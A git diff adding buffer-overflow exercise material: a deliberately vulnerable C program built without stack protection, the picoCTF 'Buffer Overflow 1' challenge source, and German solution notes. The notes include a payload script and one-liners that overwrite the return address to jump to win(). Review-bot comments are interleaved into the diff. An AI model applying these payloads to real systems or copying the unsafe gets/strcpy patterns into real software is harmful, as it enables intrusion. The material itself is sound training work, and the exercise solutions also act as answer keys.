diff --git a/assets/logic/.gitignore b/assets/logic/.gitignore
new file mode 100644
index 0000000..e2250f7
--- /dev/null
+++ b/assets/logic/.gitignore
@@ -0,0 +1 @@
+logic
diff --git a/assets/logic/Makefile b/assets/logic/Makefile
new file mode 100644
index 0000000..a9a0bc4
--- /dev/null
+++ b/assets/logic/Makefile
@@ -0,0 +1,16 @@
+# use bash so process substutution is available
+CC = gcc
+CFLAGS = -fno-stack-protector -g
+SHELL = bash
+SRC = logic.c
+TARGET = $(SRC:%.c=%)
+.PHONY: build
+build: $(TARGET)
+%: %.c
+	$(CC) ${CFLAGS} $< -o $@
+.PHONY: clean
+clean:
+	rm -f logic
diff --git a/assets/logic.c b/assets/logic/logic.c
similarity index 79%
rename from assets/logic.c
rename to assets/logic/logic.c
index ba6bab4..2812eee 100644
--- a/assets/logic.c
+++ b/assets/logic/logic.c
@@ -3,7 +3,7 @@
 void foo(char *input) {
 int is_logged_in = 0;
- char buf[50];
+ char buf[64];
 strcpy(buf, input);
 if (is_logged_in) {
 puts("logged in!!1!");
@@ -13,5 +13,9 @@ void foo(char *input) {
 }
 int main(int argc, char **argv) {
+ if (argc != 2) {
+ return 1;
+ }
 foo(argv[1]);
+ return 0;
 }
diff --git a/assets/logic/solution.md b/assets/logic/solution.md
new file mode 100644
index 0000000..9d56b39
--- /dev/null
+++ b/assets/logic/solution.md
@@ -0,0 +1,8 @@
+# Beispiel 1
+ * Debugger `gdb`
+ * `list` für Code
+ * `break ` für Breakpoint
+ * `run $(python -c 'print("A"*77)')`
+ * `show is_logged_in`
+ * `continue`
diff --git a/assets/picoctf/buffer_overflow_1/.gitignore b/assets/picoctf/buffer_overflow_1/.gitignore
new file mode 100644
index 0000000..c2981a9
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/.gitignore
@@ -0,0 +1 @@
+payload
diff --git a/assets/picoctf/buffer_overflow_1/payload.sh b/assets/picoctf/buffer_overflow_1/payload.sh
new file mode 100755
index 0000000..c25475a
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/payload.sh
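Review bot: `CFLAGS = -fno-stack-protector -g` switches the stack canary off without saying why, while the file's only comment (`# use bash so process substutution is available`, typo included) explains a `SHELL` setting that none of the recipes here appear to need, so the one flag the exercise actually depends on is undocumented. I would put the reason on the flag line, e.g. `CFLAGS = -fno-stack-protector -g  # canary off on purpose: the strcpy overflow in logic.c must be able to reach is_logged_in`, and correct the spelling to `substitution`. Two points of style: the recipe mixes `${CFLAGS}` with `$(CC)`, and `clean` hard-codes `logic` where `rm -f $(TARGET)` would follow `SRC` if it is ever changed. Nothing here disables PIE or ASLR; that is fine as long as the solution only overwrites a neighbouring local rather than an address, which is what solution.md's `show is_logged_in` step suggests.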
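Review bot: The exercise relies on `buf` sitting below `is_logged_in` so that `strcpy(buf, input)` overflows into the flag, but C gives no guarantee about the relative placement of locals; the 77-byte input in solution.md is a property of this compiler, these flags and the new 64-byte size, not of the source, and a different gcc version or `-O` level may put `is_logged_in` out of reach or below `buf`. A comment on the new declaration would spare the next reader a confusing debugging session, e.g. `char buf[64]; /* deliberately overflowed by the strcpy below; reaching is_logged_in depends on gcc's stack layout at -fno-stack-protector */`. The remainder of foo lies outside this hunk.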
@@ -0,0 +1,17 @@
+#!/usr/bin/env bash
+function repeat() {
+ n="${1}"
+ string="${2}"
+ printf "%${n}s" | tr " " "${string}"
+}
+function main() {
+ buffer_size="${1}"
+ address="${2}"
+ filler="$(repeat "${buffer_size}" A)"
+ newline="\n"
+ printf "%s%b%b" "${filler}" "${address}" "${newline}"
+}
+main "${@}"
diff --git a/assets/picoctf/buffer_overflow_1/solution.md b/assets/picoctf/buffer_overflow_1/solution.md
new file mode 100644
index 0000000..480011c
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/solution.md
@@ -0,0 +1,10 @@
+# PicoCTF - Buffer Overflow 1
+https://play.picoctf.org/practice/challenge/258?category=6&page=1
+ * Buffergröße bestimmen
+ * Return Adresse überschreiben
+ * Adresse der Zielfunktion finden `nm -g -C vuln`
+ * Little Endian!
+ * `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...`
+ * `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'`
diff --git a/assets/picoctf/buffer_overflow_1/vuln b/assets/picoctf/buffer_overflow_1/vuln
new file mode 100644
index 0000000..6b42c3e
Binary files /dev/null and b/assets/picoctf/buffer_overflow_1/vuln differ
diff --git a/assets/picoctf/buffer_overflow_1/vuln.c b/assets/picoctf/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/assets/picoctf/buffer_overflow_1/vuln.c
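Review bot: `printf "%${n}s"` in `repeat` builds a printf format string out of the first script argument without checking that it is a number, so a value like `44d` or an empty argument yields a malformed format or an empty filler and the payload silently comes out the wrong length instead of failing. A single guard in `main` before `repeat` is called covers it: `[[ "${buffer_size}" =~ ^[0-9]+$ ]] || { echo "usage: ${0} <buffer_size> <address-escapes>" >&2; exit 2; }`. A short header comment should also state that `address` goes through `%b` precisely so that `\xNN` escapes become raw bytes while the filler goes through `%s` and stays literal — that asymmetry is the whole point of the script and is easy to "normalise" away later. `set -euo pipefail` after the shebang would additionally surface failures inside the `printf | tr` pipeline, which are currently swallowed into the command substitution.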
@@ -0,0 +1,42 @@
+#include
+#include
+#include
+#include
+#include
+#include "asm.h"
+#define BUFSIZE 32
+#define FLAGSIZE 64
+void win() {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+ fgets(buf,FLAGSIZE,f);
+ printf(buf);
+}
+void vuln(){
+ char buf[BUFSIZE];
+ gets(buf);
+ printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+int main(int argc, char **argv){
+ setvbuf(stdout, NULL, _IONBF, 0);
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ puts("Please enter your string: ");
+ vuln();
+ return 0;
+}
+
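Review bot: The five `#include` lines at the top of the new file carry no header name as rendered here; if the committed blob really looks like this it will not compile, since `fopen`/`printf`/`gets` need `<stdio.h>`, `exit` needs `<stdlib.h>` and `getegid`/`setresgid` need `<unistd.h>` — worth checking the raw file rather than this view, and note that `asm.h` (which must supply `get_return_address`) is included but not added by this commit, so only the prebuilt `vuln` binary is usable as-is. `gets(buf)` in `vuln` and `printf(buf)` in `win` are the challenge's intended bugs (an unbounded read and a format-string sink fed from `flag.txt`); since this is upstream challenge source kept for the write-up I would not change them but mark them, e.g. `gets(buf); /* intentional: the overflow this challenge is about */` and `printf(buf); /* intentional format-string sink; flag.txt is assumed trusted */`, so a linter or a later cleanup does not quietly remove the vulnerability the solution depends on. The unchecked `fgets` return and the never-closed `f` are harmless for a one-shot challenge process and need no change.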